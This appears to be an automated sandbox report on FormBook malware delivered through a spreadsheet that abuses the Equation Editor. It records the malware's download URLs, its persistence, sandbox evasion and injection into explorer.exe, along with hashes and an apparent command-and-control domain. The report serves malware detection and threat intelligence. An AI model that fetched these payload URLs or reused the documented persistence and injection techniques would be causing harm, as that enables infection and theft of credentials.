Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph			Jump to behavior
Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph			Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00466698 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	9_2_00466698
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0044C6C8 IsIconic,GetCapture,	9_2_0044C6C8
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	9_2_00466DB4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	9_2_00466E64
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0044CF7C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	9_2_0044CF7C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_004635DC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	9_2_004635DC
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0044D8A0 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	9_2_0044D8A0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0042FFC4 IsIconic,GetWindowPlacement,GetWindowRect,	9_2_0042FFC4

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

9_2_0045200C

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe	RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\DpiScaling.exe	RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_004412A8

9_2_004412A8

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1580	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1256	Thread sleep time: -300000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_724888D0 rdtsc

7_2_724888D0

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

9_2_00465B98

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_004412A8

9_2_004412A8

Source: C:\Windows\SysWOW64\DpiScaling.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_00429DC8 GetSystemInfo,

9_2_00429DC8

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,		9_2_00409218
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		9_2_00405AA4

Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.646524780.000000000457A000.00000004.00000001.sdmp	Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 00000008.00000000.636828828.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000008.00000000.688904749.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

9_2_0045200C

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_724888D0 rdtsc

7_2_724888D0

Source: C:\Windows\SysWOW64\DpiScaling.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_025A26F8 mov eax, dword ptr fs:[00000030h]

7_2_025A26F8

Source: C:\Windows\SysWOW64\DpiScaling.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk,

7_2_02590048

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\DpiScaling.exe

Thread register set: target process: 1764

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe			Jump to behavior

Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_00405C7C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: GetLocaleInfoA,	9_2_0040C2D4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: GetLocaleInfoA,	9_2_0040C320
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: GetLocaleInfoA,	9_2_004065C4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: GetLocaleInfoA,GetACP,	9_2_0040DA20
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_00405D87

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_0040ACD8 GetLocalTime,

9_2_0040ACD8

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_00452658 GetVersion,

9_2_00452658

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Input Capture11	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Application Shimming1	Application Shimming1	Obfuscated Files or Information3	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder1	Process Injection312	Software Packing1	Security Account Manager	System Information Discovery116	SMB/Windows Admin Shares	Input Capture11	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder1	DLL Side-Loading1	NTDS	Security Software Discovery241	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Modify Registry1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Application Window Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection312	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.0.DpiScaling.exe.72480000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.Zxsdvph.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
7.2.DpiScaling.exe.72480000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://java.sun.com	0%	Virustotal		Browse
http://java.sun.com	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://192.3.222.155/008008/vbc.exe	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
www.septemberstockevent200.com/ht08/	0%	Avira URL Cloud	safe
http://java.w	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hqpyda.bl.files.1drv.com	unknown	unknown	false		high
onedrive.live.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.3.222.155/008008/vbc.exe	true	Avira URL Cloud: safe	unknown
www.septemberstockevent200.com/ht08/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://investor.msn.com	explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp	false		high
http://wellformedweb.org/CommentAPI/	DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleaner	explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	false		high
http://java.w	explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://servername/isapibackend.dll	explorer.exe, 00000008.00000000.687535121.0000000003E50000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.3.222.155	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502159
Start date:	13.10.2021
Start time:	17:04:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Swift.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@8/21@6/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.1% (good quality ratio 52.4%) Quality average: 79.6% Quality standard deviation: 26.9%
HCA Information:	Successful, ratio: 61% Number of executed functions: 63 Number of non-executed functions: 231
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.42.12, 13.107.42.13 Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, odc-bl-files-geo.onedrive.akadns.net, l-0004.dc-msedge.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:04:43	API Interceptor	85x Sleep call for process: EQNEDT32.EXE modified
17:05:57	API Interceptor	124x Sleep call for process: vbc.exe modified
17:06:05	API Interceptor	3x Sleep call for process: DpiScaling.exe modified
17:06:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph C:\Users\Public\Libraries\hpvdsxZ.url
17:06:08	API Interceptor	100x Sleep call for process: explorer.exe modified
17:06:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph C:\Users\Public\Libraries\hpvdsxZ.url

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	ojZRw3eBpN	Get hash	malicious	Browse	107.172.24.165
	yEumlkJuVE	Get hash	malicious	Browse	107.173.176.7
	DHL consignment number_600595460.xlsx	Get hash	malicious	Browse	198.12.84.79
	4f0PBbcOBI	Get hash	malicious	Browse	107.173.176.7
	IdXkXl1i9r	Get hash	malicious	Browse	107.173.176.7
	RlypFfB7n8	Get hash	malicious	Browse	107.173.176.7
	7iw4z5I41w	Get hash	malicious	Browse	107.173.176.7
	6wfKGbEfZN	Get hash	malicious	Browse	107.173.176.7
	Invoice_Charge.xlsx	Get hash	malicious	Browse	192.227.158.101
	090900 Quotation - Urgent.xlsx	Get hash	malicious	Browse	107.172.13.131
	Contract.xlsx	Get hash	malicious	Browse	192.3.122.140
	REF_MIDLGB34.xlsx	Get hash	malicious	Browse	23.94.159.208
	PO08485.xlsx	Get hash	malicious	Browse	107.172.13.137
	lod1.xlsx	Get hash	malicious	Browse	192.3.122.140
	Invoice Charge.xlsx	Get hash	malicious	Browse	192.227.158.101
	TransportLabel_1189160070.xlsx	Get hash	malicious	Browse	192.3.110.172
	Nuevo pedido de consulta cotizacin.xlsx	Get hash	malicious	Browse	192.3.13.95
	Payment_List.xlsx	Get hash	malicious	Browse	107.172.73.191
	REQUEST FOR OFFER 12-10-2021.xlsx	Get hash	malicious	Browse	192.3.13.11
	listed destinations.xlsx	Get hash	malicious	Browse	107.172.73.191

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Zxsdvphcjqafchepqbzkmcuuxncavgi[1] Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	downloaded
Size (bytes):	283648
Entropy (8bit):	7.995115183379276
Encrypted:	true
SSDEEP:	6144:kbRih06RY9HgIU6kWhhxTE+duyRvxu8TXVIipNEl+yRDz16w:kbV6S9HgfRMTqyw8ZIipNEJF1f
MD5:	53F221DDB7579A8E507E321ECF3708E9
SHA1:	1DBA52E74B99A3B5168C60C56198C5BA6FEBB0F5
SHA-256:	D8BE7A5A708F32C4EA7144081EF5F48D95C2F611F0C1224DAAD8211A95A48E1B
SHA-512:	FB1EC9E3D4B4D726153D247E0F6AC600716FDD7882240A9971CFD388B9D7C981A6F224FB8D9B373CB3A1CAEBC8C26F7DA390152283B40092F692D152D2D1B476
Malicious:	false
Reputation:	low
IE Cache URL:	https://hqpyda.bl.files.1drv.com/y4mRb80zT4MmCWKR90qGE-mduUvM9xXJnPMC6NLwMgoSnGtkryGuu1yCC3ty6JRPR4pc7f57Fq15iid421o3jIQHqVM0AgPPo_DSJkv2uQFXLhpioaelpoVnYkLeSTdEPG_xrxSVd_dCmSvpBHCa-Mk3fMnpqbJzSBQWevfN3FRiXmhlJhz8-lRoklD0oeocwR_XeBpinzKoPzTgM4KIsI6Rw/Zxsdvphcjqafchepqbzkmcuuxncavgi?download&psid=1
Preview:	...2z.....d.M..m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....m.......L5.8.5..6....M....7.Z..._cw S]b....).....x......}...T.BT..P.n.k..X....c..."OT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..1.)..@.6(t..k...L(u....r.~.uu;.....7`X.i..F...\|......$..n.=....."..9../s..1`p..Q.].[....j.... ..A.)w ....m.D..".+)3$..G....Y...Pt7X..t_..H..vlJ.w.E5NE ..../S.....7....[..l....k.w'.P2..Ez.5ji..v.F.&.j<..}.\v/...{..=..:.Y].k.....H..r..I:..}......J...W.y. .XRD..J....]...o....<.w..W...5.....W.i.a..u...K%Q.`p.B..-y....p..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	1014784
Entropy (8bit):	6.809458920712055
Encrypted:	false
SSDEEP:	12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
MD5:	A65B1815177EF9EBA7E5E894BBF65A3C
SHA1:	5459ECF044E62BFB53220D0E78A5B98C24F17E25
SHA-256:	298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
SHA-512:	0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
Malicious:	true
Reputation:	low
IE Cache URL:	http://192.3.222.155/008008/vbc.exe
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..............................................@..............................`'........................... ......................................................................................CODE................................ ..`DATA....d...........................@...BSS......................................idata..`'.......(..................@....tls....@................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................\|..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D9161B0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
